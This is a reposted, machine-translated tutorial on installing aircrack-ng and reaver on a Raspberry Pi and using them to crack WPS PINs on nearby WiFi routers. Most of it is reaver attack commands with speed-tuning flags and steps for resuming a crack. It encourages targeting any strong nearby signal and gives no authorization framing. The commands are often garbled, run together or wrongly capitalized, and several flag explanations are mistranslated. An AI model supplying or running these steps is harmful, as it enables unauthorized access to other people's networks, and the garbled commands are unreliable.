Raspberry Pi (raspberrypi) installation aircrack-ng,reaver and WiFi hack tutorial [finishing]

Source: Internet
Author: User

Original link: http://www.findspace.name/res/1184

Reprint Please specify

Hardware environment

Raspberry Pi B + one (I'm using the Debian environment)
One PC (or other device to directly operate PI on the line)
Wireless card (can be used on the line, but the powerful wireless card will do less, I use 3070)

Find Note:

Wireless network card is not any line, need to support the listening mode can be, the support list can be viewed here: https://wikidevi.com/wiki/Wireless_adapters/Chipset_table

Install dependent packages
sudo apt-getInstall- yLibpcap-devLibsqlite3-devSqlite3 libpcap0. 8-devLibssl-devBuild-essentialIW Tshark Subversionsudo Apt-getInstall LIBNL-3- $Libnl-3-devLibnl-3-docLibnl-genl-3-devLibnl-genl-3- $
Installing Aircarck-ng
svn co http://svn.aircrack-ng.org/trunk/ aircrack-ngcd aircrack-ng/makemake install
Installing Reaver
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gztar zxvf reaver-1.4.tar.gzcd reaver-1.4/src./configuremakesudo make install

All of the above two resource packs can be found here:
Baidu Network disk Share
If the installation succeeds, there will be, and airmon-ng airodump-ng reaver so on, the command is available.

Hack Tutorial

sudo airmon-ng start wlan0
sudo airodump-ng mon0

According to the above Airodump search for the wireless signal, and then can pick the signal strong to crack (note, to choose to open the WPS function)
Take a look at this list, which shows information about the wireless around you. Note that the MB column is displayed as "54", "54e". "And so on, which indicates the current rate mode of the wireless and the WPS is on, my own router is" Steve ", Watch," 54e "and" 54e. " "Is different, one more point, this point indicates that the WPS mode is turned on. So we're going to do a WPS probe, where we have to remember the MAC address of the SSID, and then we'll attack and probe for the MAC address.
! [][3]


-VV is looking at the details, and when you are proficient, you can use-V, which is simple. Typically,-VV are used when encountering problems.
If you want to hang up the machine, remember to add the Nohup command, you can disconnect ssh. And then the rest is waiting.


-oparameter is output to file
If the crack succeeds, open the output log, you can see the Reaver out of the password.
! [][4]

Command description: Reaver How to use:

Airmon-ng start Wlan0//Start mon0 monitoring
Reaver-i mon0-b mac-a-S-VV//General usage

If, after the 90.9% process crashes or stops, note the first four digits of the pin, using the instructions:

Reaver-i mon0-b mac-a-vv-p XXXX (pin top four digits)

Other commands

Airodump-ng Mon0 used to scan around wireless signals.
Wash-i Mon0-c This is the route used to detect the surrounding wireless support pin

If the pin does not move, try adding the-n parameter

Reaver-i mon0-b xx:xx:xx:xx:xx:xx-d 0-vv-a-s-n
You can also add delay-T 3-b 3

Common parameter explanation

-I monitors the interface name after the NIC's monitor interface, usually mon0
-B MAC address of the target MAC address AP
-A automatically detects the optimal configuration of the target AP
-S uses the smallest DH key to improve PJ speed
-VV show more non-critical warnings
-D that is, delay is set to 1 seconds per poor time
Reaver-i mon0-b mac-d 0
The above instructions can greatly speed up the PJ speed, but some APs may be overwhelmed.
-C (followed by number of channels) to specify the channel, you can easily find the signal
The first 4 bits of the-p pin four-bit or eight-bit//known PIN can be taken with this parameter, specifying the starting PIN from this number. You can find the password directly with 8 digits.
-N Do not send nack information (you can try this parameter if the PIN does not move)
-N always sends Nack to target AP, default auto
-T is the maximum time that timeout waits for feedback each time, if the signal is good, you can # # #设置
Reaver-i mon0-b mac-d 0-t. 5
-m,–mac= specifies a native MAC address that needs to be used when the AP has MAC filtering

Summary-PJ should be adjusted according to the condition parameters:

The signal is very good:
Reaver-i mon0-b mac-a-s-vv-d 0-c 1
Signal Normal:
Reaver-i mon0-b mac-a-s-vv-d 5-t. 5-c 1
General signal:
Reaver-i mon0-b mac-a-s-vv-c 1

You can use Crtl+c to pause when there is a percentage, and it will save the Reaver progress meter file in
Version 1.3:
/etc/reaver/mac address. WPC
Version 1.4:
/usr/local/etc/reaver/mac address. WPC
Using the resource Manager, manually copy the MAC address to a USB flash drive or a hard drive with a file name
After the next reboot, manually copy to the/etc/reaver/directory.

Not all routes support pin learning. The AP shuts down WPS, or no QSS drops, which will appear
Warning:failed to associate with XX:XX:XX:XX:XX:XX (ESSID:XXXX)
In the learning process can also press CTRL + C to terminate PJ, repeat the same pin code or Timeou T can be terminated, Reaver will automatically save progress.
Continue with the last PJ, then send again in the terminal:
Reaver-i Mon0-b MAC-VV
When this command is released, you will be given Y or n, and Y will continue.
When the Reaver determines the first 4-digit PIN password, its work to complete the task progress value will jump directly to more than 90.9%, that is, only the remaining 1000 password combinations (a total of 11,000 passwords).

Parameters Detailed Description:
-m,–mac= Mac of the host system
Specify a native MAC address that needs to be used when the AP has MAC filtering
-e,–essid= Essid of the target AP
Essid of routers, usually not specified
-c,–channel= Set The 802.11 channel for the interface (IMPLIES-F)
Signal the channel, if not specified will automatically scan
-o,–out-file= Send output to a log file [stdout]
Standard output to File
-s,–session= Restore A previous session file
Recovering process Files
-c,–exec= Execute the supplied command upon successful pin recovery
Execute command after pin succeeds
-d,–daemonize Daemonize Reaver
Set Reaver into daemon
-a,–auto Auto Detect the best advanced options for the target AP
Automatic detection of advanced parameters for target APS
-f,–fixed Disable Channel Hopping
No channel jumps
-5,–5ghz Use 5GHz 802.11 channels
Using 5G Channels
-v,–verbose Display non-critical warnings (-VV for more)
Show unimportant warning message-VV can show more
-q,–quiet only display critical messages
Show only critical information
-h,–help Show Help
Show Help

-VV show more non-critical warnings

Advanced Parameters:
-p,–pin= use the specified 4 or 8 digit WPS pin
Direct Read PSK (my test is unsuccessful, it is recommended to use the network card to get the software)
-d,–delay= Set The delay between PIN attempts 1
Delay between pins, default 1 seconds, recommended set 0
-l,–lock-delay= Set the time to wait if the AP locks WPS PIN attempts [60]
Wait time after AP locks WPS
-g,–max-attempts= Quit after num PIN attempts
Maximum PIN count
-x,–fail-wait= Set the time to sleep after ten unexpected failures [0]
10 wait time after unexpected failure, default 0 seconds
-r,–recurring-delay= Sleep for y seconds every x pin attempts
Wait for y seconds after every x pin
-t,–timeout= Set The Receive timeout period [5]
Receive packet timeout, default 5 seconds
-t,–m57-timeout= Set the M5/M7 timeout period [0.20]
M5/M7 Timeout, default 0.2 seconds
-a,–no-associate do not associate with the AP (association must is done by another application)
Do not connect to the AP (must have other programs completed during the connection)
-n,–no-nacks do not send NACK messages if out of order packets is received
Do not send nack information (you can try this parameter if you keep the pin fixed)
-s,–dh-small use small DH keys to improve crack speed
Increase speed with small DH key values (recommended)
-l,–ignore-locks ignore locked state reported by the target AP
Ignore the locked status reported by the target AP
-e,–eap-terminate terminate each WPS session with an EAP FAIL packet
Terminates the WPS process whenever an EAP failure packet is received
-n,–nack Target AP always sends a nack [Auto]
Always send Nack to target AP, default auto
-w,–win7 Mimic a Windows 7 registrar [False]
Analog win7 registration, default off


[3]: Http://lok.me/wp-content/uploads/2014/11/2.png ""
[4]: Http://lok.me/wp-content/uploads/2014/11/3.png ""

Raspberry Pi (raspberrypi) installation aircrack-ng,reaver and WiFi hack tutorial [finishing]

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.